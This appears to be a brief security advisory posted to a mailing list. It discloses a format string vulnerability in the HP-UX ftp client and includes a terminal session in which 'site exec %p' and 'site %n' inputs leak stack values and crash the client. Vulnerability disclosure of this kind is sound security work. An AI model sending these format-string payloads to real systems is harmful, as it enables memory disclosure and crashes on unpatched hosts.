HP/UX FTP format string vulnerability

["[ zorgon ]" <zorgon () ANTIONLINE ORG>]

HP/UX FTP format string vulnerability

A format string vulnerability exists in ftp. This vulnerability was
discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version 1.1.214.6 Wed Feb  9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon):zorgon
331 Password required for zorgon.
Password:
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200  (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)
$

And the 'SITE' command is also vulnerable
...
ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The character format strings are not being parsed correctly in the ftp client.
When HP labs fix the problem in the client, the result will be :

ftp>  site exec %n %n %n %n
--->  SITE exec %n %n %n %n
200-%n %n %n %n
200  (end of '%n %n %n %n')
ftp>

So in this case the ftpd server will not process the character format strings.
The fix will be made in the next release of the ftp client.







-------------------------------------
zorgon <zorgon () antionline org>
http://www.nightbird.free.fr

------------------------------------------------------------
Email account furnished courtesy of AntiOnline - http://www.AntiOnline.com
AntiOnline - The Internet's Information Security Super Center!